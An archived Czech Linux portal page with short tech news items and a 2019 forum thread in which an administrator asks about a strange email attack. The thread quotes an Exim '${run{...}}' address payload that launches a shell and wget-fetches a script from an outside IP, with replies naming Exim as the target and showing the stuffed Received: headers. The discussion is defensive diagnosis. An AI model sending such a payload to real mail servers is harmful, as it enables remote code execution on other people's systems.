Přihlášení | Registrace

napište » Zprávičky

dnes 11:22 | Nová verze

Memtest86+ (Wikipedie), svobodný nástroj pro kontrolu operační paměti, byl vydán ve verzi 8.00. Přináší podporu nejnovějších procesorů Intel a AMD nebo také tmavý režim.

Ladislav Hagara | Komentářů: 0

Racket 9.0

dnes 10:55 | Nová verze

Programovací jazyk Racket (Wikipedie), tj. jazyk z rodiny jazyků Lisp a potomek jazyka Scheme, byl vydán v nové major verzi 9.0. Hlavní novinku jsou paralelní vlákna (Parallel Threads).

Ladislav Hagara | Komentářů: 0

Arduino ke změnám podmínek používání a zásad ochrany osobních údajů

dnes 10:11 | Komunita

Před šesti týdny bylo oznámeno, že Qualcomm kupuje Arduino. Minulý týden byly na stránkách Arduina aktualizovány podmínky používání a zásady ochrany osobních údajů. Objevily se obavy, že by otevřená povaha Arduina mohla být ohrožena. Arduino ubezpečuje, že se nic nemění a například omezení reverzního inženýrství v podmínkách používání se týká pouze SaaS cloudové aplikace.

Ladislav Hagara | Komentářů: 0

libpng 1.6.51 opravuje 4 bezpečnostní chyby

včera 13:33 | Bezpečnostní upozornění

Knihovna libpng, tj. oficiální referenční knihovna grafického formátu PNG (Portable Network Graphics), byla vydána ve verzi 1.6.51. Opraveny jsou 4 bezpečnostní chyby obsaženy ve verzích 1.6.0 (vydána 14. února 2013) až 1.6.50. Nejvážnější z chyb CVE-2025-65018 může vést ke spuštění libovolného kódu.

Ladislav Hagara | Komentářů: 5

Raspberry Pi Official Magazine 159

včera 12:22 | Zajímavý článek

Nové číslo časopisu Raspberry Pi zdarma ke čtení: Raspberry Pi Official Magazine 159 (pdf).

Ladislav Hagara | Komentářů: 0

Hra Warhammer: Vermintide 2 na Steamu zdarma napořád

21.11. 22:33 | Zajímavý software

Hru Warhammer: Vermintide 2 (ProtonDB) lze na Steamu získat zdarma napořád, když aktivaci provedete do pondělí 24. listopadu.

Ladislav Hagara | Komentářů: 1

Xen 4.21

21.11. 19:33 | Nová verze

Virtualizační software Xen (Wikipedie) byl vydán v nové verzi 4.21. Podrobnosti v poznámkách k vydání a přehledu nových vlastností.

Ladislav Hagara | Komentářů: 0

EK schválila státní pomoc 450 milionů eur na rozšíření výroby firmy onsemi v ČR

21.11. 13:11 | IT novinky

Evropská komise schválila český plán na poskytnutí státní pomoci v objemu 450 milionů eur (téměř 11 miliard Kč) na rozšíření výroby amerického producenta polovodičů onsemi v Rožnově pod Radhoštěm. Komise o tom informovala v dnešní tiskové zprávě. Společnost onsemi by podle ní do nového závodu v Rožnově pod Radhoštěm měla investovat 1,64 miliardy eur (téměř 40 miliard Kč).

Ladislav Hagara | Komentářů: 22

Zork I, Zork II a Zork III oficiálně open source

21.11. 06:11 | Komunita

Microsoft v příspěvku na svém blogu věnovaném open source oznámil, že textové adventury Zork I, Zork II a Zork III (Wikipedie) jsou oficiálně open source pod licencí MIT.

Ladislav Hagara | Komentářů: 0

SUSE Hack Week 25

21.11. 05:55 | Komunita

První prosincový týden proběhne SUSE Hack Week 25. Zaměstnanci SUSE mohou věnovat svůj pracovní čas libovolným open source projektům, například přidání AI agenta do Bugzilly, implementaci SSH v programovacím jazyce Zig nebo portaci klasických her na Linux. Připojit se může kdokoli.

Ladislav Hagara | Komentářů: 4

Centrum | Napsat | Starší

navrhněte » Anketa

Jaké řešení používáte k vývoji / práci?

Github (35%)

Gitlab (46%)

Atlassian (19%)

Bitbucket (18%)

Gitea (22%)

Mercurial (15%)

jen git (23%)

jen svn (16%)

Jiné (uvedu v diskusi) (17%)

Celkem 392 hlasů

Komentářů: 17, poslední 19.11. 21:57

Rozcestník

AbcLinuxu

HDmag.cz

AbcLinuxu:/ Poradna / Linuxová poradna / Mail attack

Štítky: doména, mail, skript, stahování, wget

Dotaz: Mail attack

11.7.2019 19:51 alkoholik | skóre: 40 | blog: Alkoholik
Mail attack

Přečteno: 593×

Odpovědět | Admin

Obcas mi prijde email adresovany velice zvlastnim zpusobem. V Delivered-To je neco jako:


root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f10.20.30.40x22}}@moje.domena

Je jasne, ze by se mel nekde pustit skript stazeny pres wget. Nemate nekdo tuseni, co presne se snazi prostrelit?
Misto 10.20.30.40 bylo moje skutecne ip a domenu jsem taky zmenil.

Řešení dotazu:

Komentář #3 (Jendа, 1 hlasů)

Nástroje: Začni sledovat (1) ?

Odpovědi

11.7.2019 20:19 Pavel 'TIGER' Růžička | skóre: 54
Rozbalit Rozbalit vše Re: Mail attack

Vypadá to na novější "aktualizovanou verzi" pro získání údajů nad kontrolou domény.

11.7.2019 22:33 alkoholik | skóre: 40 | blog: Alkoholik
Rozbalit Rozbalit vše Re: Mail attack

Me spis zajima, ktery mail daemon/klient by jako mel mit ten super napad, ze pusti shell s wgetem. Exim? Postfix? Procmail? Nejaky soft na analyzovani logu?

Řešení 1× (alkoholik (tazatel))

12.7.2019 02:56 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Mail attack

Exim. Všimni si, že (minimálně v exempláři který přišel mně) je tam hromada Received: hlaviček.

12.7.2019 08:41 alkoholik | skóre: 40 | blog: Alkoholik
Rozbalit Rozbalit vše Re: Mail attack

Jo, muj vypada skoro stejne.

12.7.2019 13:53 madmucho
Rozbalit Rozbalit vše Re: Mail attack

Vypadá to že to pouští patrně i filtr amavisu , našel jsem toto na svém serveru také,

neco to stahuje nedotahne, poslal mi to postfix jako že padlo na špatné hlavičky do karantény.

Received: 1
Received: 2
Received: 3
Received: 4
Received: 5
Received: 6
Received: 7
Received: 8
Received: 9
Received: 10
Received: 11
Received: 12
Received: 13
Received: 14
Received: 15
Received: 16
Received: 17
Received: 18
Received: 19
Received: 20
Received: 21
Received: 22
Received: 23
Received: 24
Received: 25
Received: 26
Received: 27
Received: 28
Received: 29
Received: 30
Received: 31
Message-Id: <20190711125952.3895A9F13B@bla bla>
Date: Thu, 11 Jul 2019 14:59:52 +0200 (CEST)
From: root@sab.com

Založit nové vlákno • Nahoru

Tiskni Sdílej:

Píšeme jinde

ISSN 1214-1267 www.czech-server.cz

Redakce | Inzerce | Podmínky použití | Osobní údaje